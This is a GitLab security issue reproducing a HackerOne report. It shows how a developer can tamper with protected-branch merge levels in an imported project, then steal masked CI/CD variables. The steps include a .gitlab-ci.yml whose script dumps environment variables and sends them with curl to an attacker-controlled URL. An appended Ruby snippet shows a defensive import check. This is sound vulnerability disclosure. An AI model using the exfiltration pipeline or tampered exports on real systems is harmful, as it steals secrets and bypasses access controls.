
User with developer role (group) can modify Protected branches -> Allowed to merge setting on imported project

HackerOne report #1485381 by justas_b on 2022-02-18, assigned to @nmalcolm:


Report

Hello,

Summary

A user with developer role (group) can steal masked group/project CI/CD variables by modifying Project settings -> Protected branches -> Allowed to merge setting on imported project (tree/project/protected_branches.ndjson file).

Steps to reproduce
  1. Create 2 accounts
  2. Create a group with account A and masked CI/CD group variables (Group settings -> CI/CD -> Variables)

secretvar_masked.png

  3. Create a personal project with account B and export it
  4. Invite account B (developer) to account A's (owner) group
  5. With account B, modify the project import file, go to tree/project/protected_branches.ndjson
  6. Change the "merge_access_levels":[{"access_level":}] value to 30 if it's 40

merge_access_levels_30.png

  7. Upload the modified project to account A's group with account B
  8. By default, only maintainers are allowed to merge into protected branches ("merge_access_levels":[{"access_level":}] is 40 - 40 = maintainer, 30 = developer, etc.)
  9. Create a new branch with account B (developer)
  10. Add the following .gitlab-ci.yml file to the newly created branch and create a merge request

```yaml
image: ruby:latest

job_name2:
  script:
    - export > test.txt
    - curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)
```

new_branch_malicious_gitlab_ci_yml.png

[REDACTED]

  11. Merge the newly created branch into main (protected) branch (with account B - developer)

merge_to_protected_as_developer.png

  12. A pipeline run against a protected branch will send sensitive data to the attacker's website using curl

[REDACTED]

The impact is pretty similar to my other report #1256017

What is the current bug behavior?

It is possible to modify the "merge_access_levels":[{"access_level":}] value on imported projects

What is the expected correct behavior?

The "merge_access_levels":[{"access_level":}] should always be default - 40

Relevant logs and/or screenshots

(Paste any relevant logs - please use code blocks (```) to format console output,
logs, and code as it's very hard to read otherwise.)

Output of checks

This bug happens on GitLab.com

Impact

A user with the developer role (group) can steal masked group and project CI/CD variables. A developer can also modify the main branch without a maintainer's permission.

Attachments

How To Reproduce

Please add reproducibility information to this section:

Edited by Nick Malcolm
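As an added defensive example (not part of the report and not GitLab's own code), the import-time check that the expected behaviour above implies, in Ruby: parse `tree/project/protected_branches.ndjson`, and reset any merge access level that a developer-role importer could not have set through the UI back to the default of 40, recording each change for audit. The sample ndjson lines, the constant and function names are constructed; only the meaning of 40 (maintainer) and 30 (developer) comes from the report.

```ruby
require 'json'

# Access levels as the report states them (40 = maintainer, 30 = developer);
# NO_ACCESS mirrors GitLab's Gitlab::Access constant (assumption).
NO_ACCESS  = 0
DEVELOPER  = 30
MAINTAINER = 40
# Expected behaviour from the report: imported merge access defaults to 40.
DEFAULT_MERGE_ACCESS = MAINTAINER

# Constructed sample of tree/project/protected_branches.ndjson, one JSON object
# per line. The second line carries the tampered value described in the report.
SAMPLE_NDJSON = <<~NDJSON
  {"name":"main","merge_access_levels":[{"access_level":40}],"push_access_levels":[{"access_level":40}]}
  {"name":"release","merge_access_levels":[{"access_level":30}],"push_access_levels":[{"access_level":40}]}
NDJSON

# True when an imported merge access level would grant merge rights that the
# importing user could not set through the UI (a developer loosening 40 to 30).
# A missing or non-integer value is treated as tampered as well.
def tampered_merge_level?(access_level, importer_access_level)
  return true unless access_level.is_a?(Integer)
  importer_access_level < MAINTAINER && access_level < DEFAULT_MERGE_ACCESS
end

# Hardened import step: parse the ndjson, reset any tampered merge access level
# to the default and record what was changed so the import can be audited.
# Returns [sanitized_branches, findings].
def sanitize_protected_branches(ndjson, importer_access_level:)
  findings = []
  branches = ndjson.each_line.with_index(1).filter_map do |line, lineno|
    next if line.strip.empty?
    branch = JSON.parse(line)
    branch['merge_access_levels'] = Array(branch['merge_access_levels']).map do |level|
      next level unless tampered_merge_level?(level['access_level'], importer_access_level)
      findings << { line: lineno, branch: branch['name'], was: level['access_level'] }
      level.merge('access_level' => DEFAULT_MERGE_ACCESS)
    end
    branch
  end
  [branches, findings]
end

if __FILE__ == $PROGRAM_NAME
  # A developer importing the constructed export: the "release" line is reset.
  _branches, findings = sanitize_protected_branches(SAMPLE_NDJSON, importer_access_level: DEVELOPER)
  puts JSON.pretty_generate(findings)
end
```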